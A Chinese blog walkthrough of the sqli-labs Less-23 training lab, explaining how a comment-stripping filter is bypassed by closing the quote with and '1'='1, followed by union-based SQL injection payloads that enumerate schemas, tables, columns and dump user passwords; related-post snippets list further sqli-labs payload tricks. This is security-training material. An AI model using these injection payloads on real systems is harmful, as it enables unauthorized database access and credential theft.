sqli-labs less 23 GET -Error based - strip comments

最新推荐文章于 2024-11-01 06:00:00 发布
原创 最新推荐文章于 2024-11-01 06:00:00 发布 · 253 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#mysql #安全

本文详细描述了一次SQL注入攻击的过程,从输入ID导致的错误开始,逐步揭示了如何利用preg_replace函数的漏洞来闭合单引号。接着,通过联合查询展示了如何爆库、爆表、爆列以及爆数据,全面暴露了数据库信息。文章最后总结了SQL注入的严重性及其对数据安全的影响。

一、输入id,页面正常显示,然后输入单引号报错,添加注释符后还是报错,就让人怀疑多了括号,试了还是没用

在这里插入图片描述
二、看一下源码

1.确实是单引号闭合没有问题,再找一下出错原因

在这里插入图片描述

2.发现对$id这个变量使用了preg_replace函数。preg_replace 函数执行一个正则表达式的搜索和替换,第一个参数表示要搜索的字符串,第二个参数表示替换的字符串,第三个参数就是搜索或替换的目标。这里就是将#和–这两个注释符替换成了空格。所以我们添加注释符后才会报错,因为没有注释掉或者闭合掉后面的单引号

在这里插入图片描述

3.现在只要想办法闭合后面的单引号就好了,选择用’1’='1这个方法,成功显示,既然这关有显示位,那就用联合查询就好了

http://127.0.0.1/sqli-labs-master/Less-23/?id=1' and '1'='1

在这里插入图片描述

三、爆所有数据库

?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 and '1'='1

在这里插入图片描述

四、爆指定数据库所有表

?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 and '1'='1

在这里插入图片描述
五、爆指定表所有列

?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 and '1'='1

在这里插入图片描述

六、爆指定列所有数据

?id=-1' union select 1,(select group_concat(password) from users),3 and '1'='1

在这里插入图片描述

over~

sqli-labs训练平台靶场详解!!!!
ytdd66的博客
03-19 9505
下面选取几个具有代表性的关卡,演示几种 SQL 注入漏洞利用方法。
sqli-labs学习笔记(Less1-Less24)
极光时流
02-07 1332
sqli-labs学习笔记Less-1Less-2Less-3Less-4Less-5Less-6Less-7Less-8 Less-1 select … from … where id=’$id’ 基于union联合查询 http://127.0.0.1/sqli-labs-master/Less-1/?id=0’ 报错 http://127.0.0.1/sqli-labs-master/Le...
sqli-labs Less23 GET-Error based - strip comments
bigblue00的博客
10-11 212
Less-23 get 方式注入,过滤了注释符 当输入?id=1时,登陆成功 当输入?id=1’ 或 ?id=1’ and 1=1 --+ 或?id=1’ and 1=1 # 均显示错误 可判断闭合方式为 单引号 查看源码发现注释符都被替换为了空格,在这里可以使用另外一种特殊的注释符 ;%00 (英文输入法)。 测试输入 ?id=1’ and 1=1;%00 后可正常显示。 此关也可以基于报错注入、延时注入、利用 or ‘1’='1 进行闭合 方法一:联合查询 语句除了最后的注释符不一样其他的和
sqli-labsless23 Error based - strip comments (GET型基于错误的去除注释的注入)
ajxi63204的博客
01-26 199
、 加单引号报错 加# http://localhost/sqli-labs-master/Less-23/?id=1'%23 错误没有改变,推测过滤了# 查看源码发现# -- 都被替换掉了 那么可用通过闭合单引号的方式 http://localhost/sqli-labs-master/Less-23/?id=1' and '1'='1 然后...
SQLi Labs Lesson23
1ame的博客
08-18 426
Lesson - 23 GET - Error based - stripcomments 首先进入欢迎界面 又回到了,最开始的地方: 构造?id=1,结果如图所示: 构造?id=1',结果如图所示: 没有关闭错误回显,同时没有对单引号进行过滤。 构造?id=0 ' union select 1,2,3 # 结果如图所示:
sqli-lab学习笔记(学习笔记)(21-30)
大方子
08-21 6012
  打完21-30之后的后记:   后来发现,网上所有就是讲解sqli的,到后面都没有用查有多少字段数的order by这个语句,几乎都没有提到过,我自己也尝试在后面的变形中加入加入进去但是不知道为什么老是出错,现在我想到的办法就是   比如28a关   语句是这样的 http://10.10.10.141/sql/Less-28a/?id=0')UNion%a0SElect%a...
SQLI LABS | Less-23 GET-Error Based-Strip Comments
Blue17 の 小窝
11-01 666
可以看到,我们已经成功获取了当前站点使用的后端数据库的信息。至此,SQLI LABS Less-23 GET-Error Based-Strip Comments 成功过关。用户的登录名与登录密码。作为参数进行查询,那我们就按它的意思传入。可以看到,服务器返回了对应。要我们输入一个数字型的。
sqli-labs大详解(完结)
热门推荐
hxhxhxhxx的博客
07-28 6万+
sqlilabs详解(不断更新)题目1-10Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)GET - Error based - Intiger based (基于错误的GET整型注入)Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)Less-4 GET - Error based - Double Quotes
sqli-labs大详解
gankjk的博客
10-19 7056
Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) 首先输入参数?id=1,这时页面正常显示,并不报错。 这时我们输入?id=1‘时出现报错,可以判断它是单引号注入 常规注入,判断字段数,当我们order by10时,发生错误,然后我们用二分法判断有几个字段(向上取整)。 当我们到order by 3 时没有报错,这时候我们试试order by 4,发现报错,说明只有三个字段。 然后我们看回显...
Sqli-labs全套(1-65)-通关笔记
TyRant的博客
04-10 4845
Basic Challenges 01-Error Based-Single quotes Error Based: 可以通过报错知道闭合方式 > paylod: ?id=1') and ;--+ 源码拼接后: SELECT * FROM users WHERE id=('$id') LIMIT 0,1; SELECT * FROM users WHERE id=('1') and ;-- ') LIMIT 0,1; > err: You have an error in your SQL
sqli-labs 21——40关攻略
weixin_45880717的博客
02-02 1239
Less-21 基于错误的复杂的字符型Cookie注入 base64编码,单引号,报错型,cookie型注入。 本关和less-20相似,只是cookie的uname值经过base64编码了。 登录后页面: 圈出来的地方显然是base64加密过的,解码得到:admin,就是刚才登陆的uname,所以猜测:本题在cookie处加密了字符串, 查看php文件确实如此,所以只需要上传paylaod的时...
sqli-labs题解
F1rstb100d
10-22 1270
sqli-labs题解
sqli-labs less 7 Get -Dump into outfile -String
Monster1m的博客
01-02 452
一、输入id,提示 use outfile http://127.0.0.1/sqli-labs-master/Less-7/?id=1 二、在数据库的配置文件my.ini添加权限 secure_file_priv= #代表对文件读写没有限制 三、判断闭合方式 1.加单引号,报错 http://127.0.0.1/sqli-labs-master/Less-7/?id=1' 2.加注释符,报错 http://127.0.0.1/sqli-labs-master/Less-7/?id=
sqli-labs less 12 POST -Error Based - Double quotes -String -with twist
Monster1m的博客
01-19 347
一、bp开启拦截,打开十二关点击submit,bp收到拦截的报文 二、send to repeater,然后打开repeater模块 三、先输入单引号发现页面没错误,然后输入双引号发现有错误信息,可以考虑使用报错注入 四、既然双引号报错了,然后添加注释符发现还是报错,再添加一个括号,页面显示正常,则闭合方式为") uname=1")#&passwd=&submit=Submit 五、先来判断当前数据库 uname=1") and updatexml(1,concat('^',data
sqli-labs less 21 Cookie injection -base64 encoded -single quotes and parenthesis
Monster1m的博客
01-26 332
一、看不懂题目就先看代码吧 1.这几关基本都不用uname和passwd注入了,继续找其他注入点 2.在这里发现还是没有过滤cookie和上一关一样,继续看有没有使用到$cookee 3.然后发现先对cookee进行了base64编码,这是和上一关不一样的 4.在这里查询语句用到了cookee,确定了注入点,并且闭合符号是’) 5.输出了数据库错误信息,可以用报错注入。到现在基本上理清了思路和上一关很像,只不过是要对cookee的值进行base64编码 二、打开bp开启拦截 1.输入用户名密码,都
sqli-labs less 11 POST -Error Based - Single quotes -String
Monster1m的博客
01-19 311
一、这一关开始是post型注入,选择用burp suite代理,开启拦截(intercept is on) 二、打开第11关,用bp拦截的话要把url的127.0.0.1改为本机的ip,要不然bp检测不到 三、提交表单发现页面开始转圈圈等待,bp也拦截到了报文 四、点击action,选择send to repeater,然后打开repeater模块 五、开始注入,在uname=后加1’,然后点击go,在右面的response查看返回的界面,发现界面有显示数据库错误信息 六、证明有注入点后,判断闭
sqli-labs less 26 GET -Error based -All your SPACES and COMMENTS belong to us
Monster1m的博客
02-25 303
一、也是属于他,看看源码这次是什么属于他。从源码看除了过滤了or、and、注释符等,还过滤了空格。网上好多人说因为apache解析的问题,windows下会有无法用特殊字符替换空格的问题,但是我在linux下试了也是有解析不了的问题,不知是我操作不对还是什么。但是!!!windows下也是可以完成这关的,不用费劲再跑去用linux 二、网上有好多空格的替代方法,比如以下几个,还有些双空格啊什么的,然后我自己试的话只有%0b和双空格会成功,所以大家可以多试几个替换方法 %09 TAB 键(水平) %0a 新
sqli-labs less 18 POST- Header injections - Uagent field -error based
Monster1m的博客
01-25 299
一、这关提示头部注入。先来看一下源码 1.又出现了check_input函数,说明又开始进行了输入的过滤,先来找找哪些变量用到了这个函数 2.这里发现uname和passwd都进行了过滤,所以不能作为注入点,需要找其他没有被过滤的注入点 3.$_SERVER是一个包含了头信息、路径等的数组,这里直接赋值了agent没有对数据进行检查,下一步就是要找到有没有数据库语句用到这个uagent变量 4.发现这里的插入语句用到了uagent,可以确定在此注入,并且是用单引号闭合 5.这里有有输出数据库错误信息
sqli-labs less8 Get -Blind -Boolian based -Single quotes
Monster1m的博客
01-02 290
一、输入id,页面正常 http://127.0.0.1/sqli-labs-master/Less-8/?id=1 二、判断闭合方式以及注入方式 1.添加单引号,显示错误页面且无报错信息 http://127.0.0.1/sqli-labs-master/Less-8/?id=1' 2.添加注释符,页面正常显示,则闭合方式为单引号 http://127.0.0.1/sqli-labs-master/Less-8/?id=1'--+ 3.由于没显示错误信息,所以选择盲注,这关提示用布尔盲注 三、判断
sqli-labs less8
最新发布
08-19
sqli-labs 平台的 Less-8 关卡是一个典型的布尔盲注(Boolean-based Blind SQL Injection)场景。该关卡没有明确的回显信息,攻击者需要通过页面返回的布尔状态(正常或异常)来判断注入语句是否执行成功,从而逐步...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值